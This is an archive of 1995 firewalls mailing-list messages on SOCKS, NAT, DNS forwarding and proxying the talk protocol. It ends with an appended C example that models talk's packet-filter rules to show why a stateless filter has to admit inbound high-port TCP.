? The PCs have a resolv.cfg file without the global DNS server; they can resolve only our own machines.

See the picture:

    ....            ....              ....
    .  .            .  .              .  .
    ....            ....              ....
      .               .                 .
    ........................................................
     PC           SOCKS SERVER       DNS SERVER
                                     ip = a.b.c.d

The PC has a SOCKS server configuration. The SOCKS server is compiled with #define SOCKS_DEFAULT_NS "a.b.c.d" in the include/socks.h. Is it possible for the PC to resolve an ip address in this configuration? If it is not, for which kind of configuration is the SOCKS_DEFAULT_NS necessary?
Thanks for your cooperation ----------------------------------------- | Pascal MELCHIOR | | E-mail: pmelchio@cdg-co.fr.DHL.COM | ----------------------------------------- %UEND From firewalls-owner Tue Sep 5 07:30:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA23904 for firewalls-outgoing; Tue, 5 Sep 1995 07:07:21 -0700 Received: from services ([168.166.0.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA23897 for ; Tue, 5 Sep 1995 07:07:16 -0700 Received: from services by services (SMI-8.6/SMI-SVR4) id JAA08657; Tue, 5 Sep 1995 09:06:52 -0500 Date: Tue, 5 Sep 1995 09:06:49 -0500 (CDT) From: "Frank K. Senter" X-Sender: fsenter@services To: Paul Ferguson cc: Mike Culver-Support , firewalls@greatcircle.com Subject: Re: Frame-Relay Net Connections In-Reply-To: <9509032216.AA20292@hawksbill.sprintmrn.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't think Mike's original question was understood: He wants to build a bastion-host firewall, possibly at his headquarters location. His problem is that he has one frame relay interface at this site, multiple PVCs of which most go to other company sites, and one PVC built to communicate with the public Internet. Because all of these logical circuits are bundled on one physical cable, its kind of difficult for Mike to plug his bastion host in the middle. The question didn't relate to the security level of frame relay--just how the heck do you plugumitz together. Mike, I think you are going to have to break down and purchase an additional router interface--perhaps even another router if you want a firewall with two routers and a DMZ between them. Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. 
Box 270 Jefferson City MO 65102

From firewalls-owner Tue Sep 5 07:32:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA23894 for firewalls-outgoing; Tue, 5 Sep 1995 07:07:10 -0700 Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA23886 for ; Tue, 5 Sep 1995 07:07:07 -0700 Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/4.1.4) with SMTP id JAA19926; Tue, 5 Sep 1995 09:03:54 -0500 Message-Id: <199509051403.JAA19926@intex.intex.net> X-Sender: lpierce@intex.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 05 Sep 1995 09:14:13 -0500 To: "matt (IEZ AG)" <100632.1345@compuserve.com>, firewalls-mailing-list From: lpierce@intex.net (S. Lane Pierce) Subject: Re: firewall with only one IP address ??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Matt-

Are you sure you only get 1 host address or 1 network address? Usually 1 class c network address is assigned, this will yield 254 host addresses. Your outside router and any host on the DMZ (ones that you want directly accessible from the Internet) must have a "NIC sanctioned" ip. Check with your provider.

Good luck.

At 02:17 AM 9/5/95 EDT, matt (IEZ AG) wrote:
>Hi all,
>
>we have one question:
>Our firm now wants to connect to the internet, but we will get only
>one official IP-address. First, we believed this would be no problem
>because we'll use the 10.0.0.0 net as our internal network and we
>will be able to manage the connections over proxies.
>So we hoped a firewall could do two things: protect our private network
>and connect every internal host against the internet.
>But unfortunately, our router just needs our only official
>IP-address, and the firewall can only get a 10.x.y.z address.
>The problem is that the firewall behind the router cannot perform
>the connection between internet and our private net because it isn't
>available directly from the internet, or are we wrong?
>Is there another possibility to install the proxies?
>Ok, we could use a LINUX workstation both as the router and application
>gateway, but we're not very happy with this idea for several reasons.
>First we'll try to ask you, does anyone have any other good idea?

[.sig snipped]

S. Lane Pierce lpierce@intex.net

From firewalls-owner Tue Sep 5 07:48:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA24224 for firewalls-outgoing; Tue, 5 Sep 1995 07:17:06 -0700 Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA24217 for ; Tue, 5 Sep 1995 07:17:02 -0700 Received: from mike_pc by ncelec.com (5.4R3.10/200.2.1.5) id AA17254; Tue, 5 Sep 1995 07:12:46 -0700 Date: Tue, 5 Sep 1995 07:12:46 -0700 Message-Id: <9509051412.AA17254@ncelec.com> X-Sender: mculver@ncelec.com X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Frank K. Senter" From: Mike Culver Subject: Re: Frame-Relay Net Connections Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 09:06 AM 9/5/95 -0500, you wrote:
>I don't think Mike's original question was understood: He wants to build
>a bastion-host firewall, possibly at his headquarters location. His
>problem is that he has one frame relay interface at this site, multiple
>PVCs of which most go to other company sites, and one PVC built to
>communicate with the public Internet. Because all of these logical
>circuits are bundled on one physical cable, its kind of difficult for
>Mike to plug his bastion host in the middle. The question didn't relate
>to the security level of frame relay--just how the heck do you plugumitz
>together.
>
>Mike, I think you are going to have to break down and purchase an
>additional router interface--perhaps even another router if you want a
>firewall with two routers and a DMZ between them.

Thanks for clarifying the situation. Ain't always that easy. In this instance, one reason (though by far not the main reason) I don't want to purchase a separate line is that the local telco (US West) has been running FIVE MONTHS lead time on new circuits!

From firewalls-owner Tue Sep 5 08:30:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26734 for firewalls-outgoing; Tue, 5 Sep 1995 08:24:38 -0700 Received: from rugrat.glyphic.com (ns.glyphic.com [205.164.126.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA26727 for ; Tue, 5 Sep 1995 08:24:35 -0700 Received: from [205.164.126.163] by rugrat.glyphic.com with smtp (Smail3.1.28.1 #1) id m0spzpm-000Gv8C; Tue, 5 Sep 95 08:22 PDT X-Sender: markl@rugrat.glyphic.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 5 Sep 1995 08:24:47 -0700 To: "matt (IEZ AG)" <100632.1345@compuserve.com> From: markl@glyphic.com (Mark Lentczner) Subject: Re: firewall with only one IP address ??? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Ok, we could use a LINUX workstation both as the router and application
>gateway, but we're not very happy with this idea for several reasons.

I used to run our net this way:

    *=====+===(Ethernet)===+=====*
          |                |
    Workstation(s)       Linux ------(ppp)------ Big Bad Internet
                           |
    Workstation(s) -----(ppp)----+

It worked fine. I had one (and only one) valid IP address. Everything on the Ethernet used "net 10". In this config, there is no need for a router, as there is NO routing. Note that the Linux box is not routing at all: All packets to/from the Internet must leave/arrive from processes on the Linux box.
Linux is especially nice for this application because of the Masquerade patch option, which is sort of a kernel level application gateway: You can have Linux automatically renumber and forward packets to/from the internal network from/to the internet. The Internet machines think they are talking to the Linux box, but they are really connecting to the internal machines. This only works for connections established from the internal network - which is typically what you want: Your users can WWW out, but no one can WWW (or Telnet, FTP, etc...) in.

I ran normal application gateway apps on Linux for a number of services as well.

- Mark

-------------------
Mark Lentczner
Glyphic Technology
1209 Villa Street
Mtn. View, CA 94041
415/964-5311
markl@glyphic.com
http://www.glyphic.com/

From firewalls-owner Tue Sep 5 09:00:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA27959 for firewalls-outgoing; Tue, 5 Sep 1995 08:54:48 -0700 Received: from internet.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA27952 for ; Tue, 5 Sep 1995 08:54:29 -0700 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id LAA22986 for ; Tue, 5 Sep 1995 11:48:46 -0400 Received: by metis.milkyway.com (8.6.9/BSDI-Client) id LAA18424; Tue, 5 Sep 1995 11:56:08 -0400 To: firewalls@greatcircle.com Path: not-for-mail From: mcr@milkyway.com (Michael Richardson) Newsgroups: milkyway.mail.firewalls Subject: Re: DNS forwarding problem Date: 5 Sep 1995 11:56:06 -0400 Organization: Milkyway Networks Corporation, Ottawa, ON Lines: 35 Distribution: milkyway Message-ID: <42hrum$hvl@metis.milkyway.com> References: <199509031937.VAA29975@gsv.gu.se> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

In article <199509031937.VAA29975@gsv.gu.se>, Harald Astrand wrote:
>The internal root servers are set up with a named.boot file:
>
>primary .
db.root
>forwarders x.x.x.x
>
>The x.x.x.x host is the firewall machine on a separate C-net.
>
>On the firewall I have a regular (non-root) name-server.
>When I try to reach an outside host with nslookup from the internal root I get
>the following error-message:
>
>can't find x.y.z: Non-existent domain.
>
>I guess this is because the internal root thinks itself as authoritative of

Do not make it authoritative for the root. forwarders should get it access to the root name servers, so no problem.

Where you get into trouble is when you have extended (multiple layers of delegation) DNS servers. I looked into making "sortlist" sort the forwarders line as well (so that DNS servers that are "internal" get preference before ones that are external). I have not done this yet.

--
:!mcr!: | Milkyway Networks Corporation
Michael Richardson | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.

From firewalls-owner Tue Sep 5 09:34:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA28571 for firewalls-outgoing; Tue, 5 Sep 1995 09:21:05 -0700 Received: from wasp.eng.ufl.edu (wasp.eng.ufl.edu [128.227.116.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA28564 for ; Tue, 5 Sep 1995 09:21:02 -0700 Received: from localhost by wasp.eng.ufl.edu (8.6.9/4.2) id MAA28686; Tue, 5 Sep 1995 12:19:30 -0400 Message-Id: <199509051619.MAA28686@wasp.eng.ufl.edu> To: Firewalls@GreatCircle.COM Subject: S/key "key" program for MacIntosh? Date: Tue, 05 Sep 1995 12:19:29 -0400 From: Andy Wilcox Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Subject line says it all. I've checked the s/key archive on ftp.bellcore.com but they've got source and PC binaries - no Mac.
I'd appreciate any pointers, thanks,

Andy

From firewalls-owner Tue Sep 5 10:00:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA29818 for firewalls-outgoing; Tue, 5 Sep 1995 09:57:04 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA29811 for ; Tue, 5 Sep 1995 09:57:00 -0700 Received: from joplin.bwh.harvard.edu (joplin.bwh.harvard.edu [134.174.81.45]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id MAA19389; Tue, 5 Sep 1995 12:53:32 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by joplin.bwh.harvard.edu (8.6.9) id MAA13875; Tue, 5 Sep 1995 12:47:36 -0400 Message-Id: <199509051647.MAA13875@joplin.bwh.harvard.edu> Subject: Re: HannaH from SecureWare Inc. To: mwr@sware.com (Mark W. Reardon) Date: Tue, 5 Sep 1995 12:47:36 -0400 (EDT) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: <9509012251.AA05261@neptune.sware.com> from "Mark W. Reardon" at Sep 1, 95 06:51:02 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 828 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Mark Reardon wrote:
| Logging out:
| On all systems, key material is protected within a special Cryptographic
| Subsystem and is not accessible to an application. It is deactivated
| (or destroyed) when the user logs out. Perhaps a point release should
| include a screen saver option that automatically deactivates the key
| material after an appropriate interval of inactivity. Of course, the
| ultimate level of protection provided the key material depends upon the
| overall security of the underlying platform. That is why Hannah is
| offered on platforms including military grade B-level operating systems.

That's very interesting.
How do you protect memory on a PC running Windows?

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From firewalls-owner Tue Sep 5 11:02:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01659 for firewalls-outgoing; Tue, 5 Sep 1995 11:01:16 -0700 Received: from gatekeeper.b400.cbe.ab.ca (GateKeeper.B400.CBE.AB.CA [164.166.2.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA01650 for ; Tue, 5 Sep 1995 11:01:11 -0700 Received: (from smap@localhost) by gatekeeper.b400.cbe.ab.ca (8.6.11/8.6.9) id LAA29730 for ; Tue, 5 Sep 1995 11:55:38 -0600 Received: from iss100.b400.cbe.ab.ca(164.166.4.1) by gatekeeper.b400.cbe.ab.ca via smap (V1.3) id sma029725; Tue Sep 5 11:55:20 1995 Received: from net02 (Net02.B400.CBE.AB.CA) by CBE.AB.CA (PMDF V4.3-13 #5915) id <01HUWZX3C4Q88ZH5L3@CBE.AB.CA>; Tue, 05 Sep 1995 12:01:22 -0700 (MST) Date: Tue, 05 Sep 1995 11:58:39 -0600 From: netmgr02@cbe.ab.ca (Glen Larwill) Subject: Talk Proxy??? X-Sender: netmgr02@iss100.b400.cbe.ab.ca To: firewalls@greatcircle.com Message-id: <01HUWZX3D7B68ZH5L3@CBE.AB.CA> X-Envelope-to: firewalls@greatcircle.com MIME-version: 1.0 X-Mailer: Content-type: text/plain; charset="us-ascii" Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Has anyone created a Talk proxy that works with the TIS FWTK? We have a large number of users that are complaining because our firewalls cannot handle Talk.

Any help would be greatly appreciated.
Glen Larwill - glarwill@cbe.ab.ca
PH (403) 294-8380, FAX (403) 294-8431
Network Programmer Analyst
Calgary Board of Education
Calgary Alberta, Canada

From firewalls-owner Tue Sep 5 11:31:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02630 for firewalls-outgoing; Tue, 5 Sep 1995 11:22:53 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA02622 for ; Tue, 5 Sep 1995 11:22:50 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id OAA18306; Tue, 5 Sep 1995 14:21:17 -0400 From: Howard Berkowitz Message-Id: <199509051821.OAA18306@clark.net> Subject: Re: Talk Proxy??? To: netmgr02@cbe.ab.ca (Glen Larwill) Date: Tue, 5 Sep 1995 14:21:16 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <01HUWZX3D7B68ZH5L3@CBE.AB.CA> from "Glen Larwill" at Sep 5, 95 11:58:39 am X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 534 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>
> Has anyone created a Talk proxy that works with the TIS FWTK? We have a
> large number of users that are complaining because our firewalls cannot
> handle Talk.
> Any help would be greatly appreciated.

On a closely related topic of proxies (admittedly for compatibility rather than security), is anyone aware of a proxy between a conventional telnet application such as talk, and the TDD protocol for hearing-impaired users? Even better, a server for such? Has anyone implemented TDD directly as a firewall service?
Howard From firewalls-owner Tue Sep 5 11:32:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02506 for firewalls-outgoing; Tue, 5 Sep 1995 11:20:22 -0700 Received: from posaune.tamu.edu (POSAUNE.TAMU.EDU [128.194.177.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA10072 for ; Mon, 4 Sep 1995 13:59:17 -0700 From: dhess@net.tamu.edu Received: by posaune.tamu.edu (NX5.67e/NX3.0M) id AA09157; Mon, 4 Sep 95 15:57:45 -0500 Message-Id: <9509042057.AA09157@posaune.tamu.edu> Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3 v118.2) Received: by NeXT.Mailer (1.118.2) Date: Mon, 4 Sep 95 15:57:43 -0500 To: academic-firewalls@net.tamu.edu, firewalls@greatcircle.com Subject: New mailing list for Drawbridge users Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Due to requests for one, I've set up a new mailing list for Drawbridge users. To subscribe send a note to majordomo@net.tamu.edu and put subscribe drawbridge in the body of the message. The address for the list is drawbridge@net.tamu.edu. Note that this used to be the alias for contacting the authors. To contact the authors now, use drawbridge-owner@net.tamu.edu. Here is the welcome file for the list: ---------------- Welcome to the drawbridge mailing list.... What is Drawbridge? Drawbridge is a copyrighted but freely distributable bridging IP filter with a powerful syntax and good performance. It uses a PC with either two Ethernet cards or two FDDI cards to perform the filtering. It is composed of three different tools: Filter, Filter Compiler and Filter Manager. The latest distribution is version 2.0 which is a major overhaul of Filter. This list is for the users of the TAMU Drawbridge security package and is intended for the discussion of any issues relating to Drawbridge. This list will also be the first place that any announcements and bug reports concerning Drawbridge will appear. 
Messages intended for the list should be addressed to drawbridge@net.tamu.edu. Subscription updates should be addressed to the Majordomo list manager at majordomo@net.tamu.edu. If you need assistance, send a message to drawbridge-owner@net.tamu.edu ---------------- Dave --- David K. Hess Network Analyst David-K-Hess@tamu.edu Computing and Information Services - Network Group (409) 845-0372 (work) Texas A&M University From firewalls-owner Tue Sep 5 12:04:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03043 for firewalls-outgoing; Tue, 5 Sep 1995 11:38:00 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA03035; Tue, 5 Sep 1995 11:37:56 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 5 Sep 1995 11:37:05 -0800 To: netmgr02@cbe.ab.ca (Glen Larwill), firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Talk Proxy??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:58 AM 9/5/95, Glen Larwill wrote: >Has anyone created a Talk proxy that works with the TIS FWTK? We have a >large number of users that are complaining becuase our firewalls cannot >handle Talk. Don't hold your breath. Talk is an annoyingly convoluted mess of a protocol. Before you're done, you've had to both send and receive arbitrary UDP packets through your firewall, all to negotiate (for an outgoing talk session) an incoming TCP connection from a random external port number to a random internal port number. There are 6 parties involved in establishing a talk session: two users, two servers, and two clients. For the purpose of this illustration, we'll call these the "local" and "remote" user/server/client, and abbreviate them LU/LS/LC/RU/RS/RC. We'll assume that the local user is the one initiating the 'talk' request. 
Here are the steps you go through:

1) Local User (LU) initiates talk program, tells it what remote user they want to talk to.
2) Local Client (LC) contacts Remote Server (RS) using UDP to page Remote User (RU)
3) While waiting for RU to respond, LC contacts Local Server (LS) using UDP to tell it to expect the incoming call from the Remote Client (RC), and to tell it what port number LC is expecting the incoming TCP connection on.
4) Meanwhile, back at the ranch, RU starts RC.
5) RC contacts LS using UDP, and learns what TCP port LC is listening for incoming TCP connection on.
6) Finally, RC opens a TCP connection to LC, and users begin talking.

Note what you have going across your firewall here:

A) UDP packets from >1024 on local to 517/518 (oh, yeah, did I forget to mention that there are two different incompatible versions of talk?) on remote, and back.
B) UDP packets from >1024 on remote to 517/518 on local, and back.
C) TCP from >1024 on remote to >1024 on local.

The protocol probably _could_ be proxied, but it would be difficult, and I don't think anyone's done it yet.

From a protocol/port standpoint, IRC is simpler; it simply involves a single TCP connection from client to server, at least until you start using Direct Client Connection (DCC) mode. However, IRC has had a number of problems with poorly designed and unsafe clients and servers. I might contemplate running a strictly-internal IRC client/server net, but running an IRC client talking to external servers, or running an IRC server that external clients or servers could talk to, would make me very nervous.
-Brent

--
Brent Chapman | Great Circle Associates | For Firewalls Tutorial info:
Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM
+1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com

From firewalls-owner Tue Sep 5 12:05:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02664 for firewalls-outgoing; Tue, 5 Sep 1995 11:23:17 -0700 Received: from longtail.ibl.bm (longtail.ibl.bm [199.172.192.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA02632 for ; Tue, 5 Sep 1995 11:23:09 -0700 Received: from [199.172.252.28] (dial28.ibl.bm [199.172.252.28]) by longtail.ibl.bm (8.6.11/8.6.11) with SMTP id PAA00461 for ; Tue, 5 Sep 1995 15:27:26 -0300 Date: Tue, 5 Sep 1995 15:27:26 -0300 X-Sender: TELECOMS@mail.ibl.bm Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: TELECOMS@ibl.bm (TELECOMS) Subject: Firewall-1 - Is it as good as it appears to be? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I have just completed some preliminary testing of Firewall-1 product, version 1.2, by Checkpoint Technologies, and I was impressed overall with the entire product. I assessed the following areas, and here are my comments.

1) User Friendliness - I found that one of the good things about this product was its ease of use, whether defining your security rules or defining your network environment.

2) Security/User Authentication - This was definitely one of its strong points. I am particularly interested in comments with its interface with the SecurID access card. I basically found that once your security rules were defined, Firewall-1 did exactly what it was supposed to do.

3) Central Administration - Even though I did not have the opportunity to test the administration of multiple firewalls, I am interested in any feedback other users have regarding this matter.
4) Reporting/Alerting/Auditing - This is an area I had high regard for. I found the online log viewer especially powerful and flexible, the online alerting mechanism a handy but important tool, and the auditing mechanism thorough. Even though there were no standard reports already produced, it was easy enough to customise exactly the information you needed.

5) Bugs/Loopholes/Inconsistencies - To date I have not been aware of any problems with this version.

6) Performance - I would also welcome any comments regarding this issue using Solaris 2.4.

Please forward any comments other users may have with Firewall-1 in the aforementioned areas and maybe any other issues you may feel would be helpful knowing about this product.

Thanking you in advance

Dwayne

From firewalls-owner Tue Sep 5 12:35:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA03892 for firewalls-outgoing; Tue, 5 Sep 1995 12:01:20 -0700 Received: from galileo.tracor.com (galileo.tracor.com [131.189.101.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA03884 for ; Tue, 5 Sep 1995 12:01:13 -0700 Received: from brazos.sdd.tracor.com by galileo.tracor.com (8.6.5/1.34) id NAA01741; Tue, 5 Sep 1995 13:59:36 -0500 Received: (from plupa@localhost) by brazos.sdd.tracor.com (8.6.12/8.6.12) id NAA09193 for Firewalls@GreatCircle.COM; Tue, 5 Sep 1995 13:59:32 -0500 Date: Tue, 5 Sep 1995 13:59:32 -0500 From: Paul Lupa X4184 Message-Id: <199509051859.NAA09193@brazos.sdd.tracor.com> To: Firewalls@GreatCircle.COM Subject: FTP Proxy not working with Netscape X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I have installed the TIS firewall kit but I now have a problem with Proxies on Netscape. The HTTP proxy works fine, I can manually get thru the telnet and ftp proxy, but netscape does not get thru. The logs from the proxy show activity, but the logs do not show a denial.

Help would be appreciated. I will summarize.
Paul Lupa ------------------ Tracor Applied Sciences Internet: Paul_Lupa@tracor.com 6500 Tracor Ln MS 27-17 Voice: (512) 929-4184 Austin, Texas 78725 FAX: (512) 929-4163 ----- End Included Message ----- From firewalls-owner Tue Sep 5 13:30:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA07377 for firewalls-outgoing; Tue, 5 Sep 1995 13:09:15 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA07370 for ; Tue, 5 Sep 1995 13:09:12 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id PAA00775; Tue, 5 Sep 1995 15:59:24 -0400 Date: Tue, 5 Sep 1995 15:59:23 -0400 (EDT) From: David Miller Subject: Re: FTP Proxy not working with Netscape To: Paul Lupa X4184 cc: Firewalls@GreatCircle.COM In-Reply-To: <199509051859.NAA09193@brazos.sdd.tracor.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 5 Sep 1995, Paul Lupa X4184 wrote: I think this should be a FAQ. AND it should be on fwtk-users, not firewalls. > I have installed the TIS firewall kit but I now have a problem with Proxies on > Netscape. The HTTP proxy works fine, I can manually get thru the the > telnet and ftp proxy, but netscape does not get thru. The logs from > the proxy show activity, but the logs do not show a denial. > > Help would be appreciated. I will summarize. The most common problem is expecting netscape to use ftp-gw. It doesn't. Point the proxy to the httpd-gw and you'll be cooking with gas:) --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! 
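Brent's six-step description of talk (in the Talk Proxy thread above) and the three flows A, B and C he lists, turned into a small stateless packet-filter model. This is an added example, not code from the original post or from any firewall product; the rule ordering, the direction labels, the sample port numbers and the X11 port 6000 check are my own choices. It shows why a packet filter that admits talk ends up admitting every unsolicited inbound TCP connection to an inside port above 1024, which is the point that makes a proxy the only clean answer.

```c
#include <stdio.h>

/* Protocol and direction as seen from the firewall's inside network. */
enum proto { UDP, TCP };
enum dir { OUT, IN };   /* OUT: inside -> Internet, IN: Internet -> inside */

/* sport is the sender's port and dport the receiver's port for that direction. */
struct pkt { enum proto proto; enum dir dir; int sport; int dport; };

struct rule {
    const char *label;
    enum proto proto;
    enum dir dir;
    int sport_lo, sport_hi;
    int dport_lo, dport_hi;
};

/* Brent's flows A, B and C as stateless filter rules. Both talk versions
 * (ports 517 and 518) are covered by one range; ">1024" is 1025-65535. */
static const struct rule talk_rules[] = {
    { "A: UDP inside >1024 -> remote 517/518", UDP, OUT, 1025, 65535, 517,  518   },
    { "A: ...and back",                        UDP, IN,  517,  518,   1025, 65535 },
    { "B: UDP remote >1024 -> inside 517/518", UDP, IN,  1025, 65535, 517,  518   },
    { "B: ...and back",                        UDP, OUT, 517,  518,   1025, 65535 },
    { "C: TCP remote >1024 -> inside >1024",   TCP, IN,  1025, 65535, 1025, 65535 },
};

#define NRULES (sizeof talk_rules / sizeof talk_rules[0])

static int in_range(int v, int lo, int hi) { return v >= lo && v <= hi; }

/* Index of the first rule permitting the packet, or -1 if it would be dropped. */
int talk_filter(const struct pkt *p)
{
    size_t i;
    for (i = 0; i < NRULES; i++) {
        const struct rule *r = &talk_rules[i];
        if (r->proto == p->proto && r->dir == p->dir &&
            in_range(p->sport, r->sport_lo, r->sport_hi) &&
            in_range(p->dport, r->dport_lo, r->dport_hi))
            return (int)i;
    }
    return -1;
}

/* Wrappers so each flow can be checked by port pair alone. */
int allows_udp_out(int sport, int dport) { struct pkt p = { UDP, OUT, sport, dport }; return talk_filter(&p); }
int allows_udp_in(int sport, int dport)  { struct pkt p = { UDP, IN,  sport, dport }; return talk_filter(&p); }
int allows_tcp_in(int sport, int dport)  { struct pkt p = { TCP, IN,  sport, dport }; return talk_filter(&p); }

int main(void)
{
    /* Constructed port numbers for one outgoing talk session (steps 2, 5, 6). */
    printf("step 2  LC->RS udp 3001->518:    rule %d\n", allows_udp_out(3001, 518));
    printf("step 5  RC->LS udp 4020->518:    rule %d\n", allows_udp_in(4020, 518));
    printf("step 6  RC->LC tcp 40001->3002:  rule %d\n", allows_tcp_in(40001, 3002));
    /* The price of rule C: any unsolicited TCP connection to an inside high port. */
    printf("unsolicited tcp 40001->6000 (X11): rule %d\n", allows_tcp_in(40001, 6000));
    printf("unsolicited tcp 40001->23 (telnet): rule %d\n", allows_tcp_in(40001, 23));
    return 0;
}
```

Rule C is the one that hurts: the filter cannot know which inside high port LC announced in step 3, because that number only travels inside the UDP payload, so a static rule has to open the whole range. A proxy that parses the talk exchange, or a stateful filter that opens exactly the announced port for the lifetime of the session, is what closes that hole.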
